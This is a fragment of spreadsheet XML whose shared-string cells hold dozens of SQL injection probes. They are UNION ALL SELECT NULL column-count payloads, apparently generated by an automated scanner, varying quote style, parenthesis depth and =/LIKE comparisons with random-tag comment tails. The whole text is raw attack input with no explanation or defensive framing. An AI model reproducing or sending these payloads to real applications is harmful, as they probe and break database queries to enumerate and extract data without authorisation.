    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'SBQN' = 'SBQN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'QRdu' = 'QRdu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'BVXk' = 'BVXk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'pCfq' = 'pCfq</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Agdg' = 'Agdg</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</si>
  <si>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'xCod' = 'xCod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</si>
  <si>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'muqX' = 'muqX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'sDvD' = 'sDvD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'GPzs' = 'GPzs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'guvb' = 'guvb</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Senm' = 'Senm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'YxNH' = 'YxNH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'wFij' = 'wFij</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'hfjl' = 'hfjl</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'CUYT' = 'CUYT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'iXCd' = 'iXCd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</si>
  <si>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'oxQE' = 'oxQE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'togh' LIKE 'togh</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Nrlj' LIKE 'Nrlj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ydEg' LIKE 'ydEg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Chel' LIKE 'Chel</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'blOx' LIKE 'blOx</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'poUK' LIKE 'poUK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'aRyY' LIKE 'aRyY</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'StzW' LIKE 'StzW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'JAjI' LIKE 'JAjI</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</si>
  <si>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'mkEc' LIKE 'mkEc</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'IizK' LIKE 'IizK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'TTwb' LIKE 'TTwb</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'RDRT' LIKE 'RDRT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'owBx' LIKE 'owBx</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'bmcf' LIKE 'bmcf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'XuCl' LIKE 'XuCl</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Zptt' LIKE 'Zptt</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'cbIV' LIKE 'cbIV</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</si>
  <si>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'vrdM' LIKE 'vrdM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</si>
  <si>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'lUnx' LIKE 'lUnx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'qEsX' LIKE 'qEsX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'lvVV' LIKE 'lvVV</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'cCuk' LIKE 'cCuk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'AKot' LIKE 'AKot</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'sfbn' LIKE 'sfbn</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'cGQX' LIKE 'cGQX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'UKoF' LIKE 'UKoF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'bcep' LIKE 'bcep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</si>
  <si>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'qsGt' LIKE 'qsGt</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</si>
  <si>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'qUbB' LIKE 'qUbB</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'fKcZ' LIKE 'fKcZ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'dqWn' LIKE 'dqWn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'bvZu' LIKE 'bvZu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Khei' LIKE 'Khei</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'IGCo' LIKE 'IGCo</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'CYOs' LIKE 'CYOs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'lzGW' LIKE 'lzGW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'uEFW' LIKE 'uEFW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'oFsy' LIKE 'oFsy</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</si>
  <si>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'mrcN' LIKE 'mrcN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "XVRI" = "XVRI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "YzAD" = "YzAD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "bdie" = "bdie</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qprR" = "qprR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "PAwq" = "PAwq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "ySDb" = "ySDb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "UBQQ" LIKE "UBQQ</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</si>
  <si>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"fNVA" LIKE "fNVA</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</si>
  <si>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"vkim" LIKE "vkim</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "xlDc" LIKE "xlDc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "uNdt" LIKE "uNdt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "KdiF" LIKE "KdiF</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "dvhW" LIKE "dvhW</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "uEVi" LIKE "uEVi</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "SHvj" LIKE "SHvj</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "RMae" LIKE "RMae</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "aTip" LIKE "aTip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</si>
  <si>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"EvTz" LIKE "EvTz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</si>
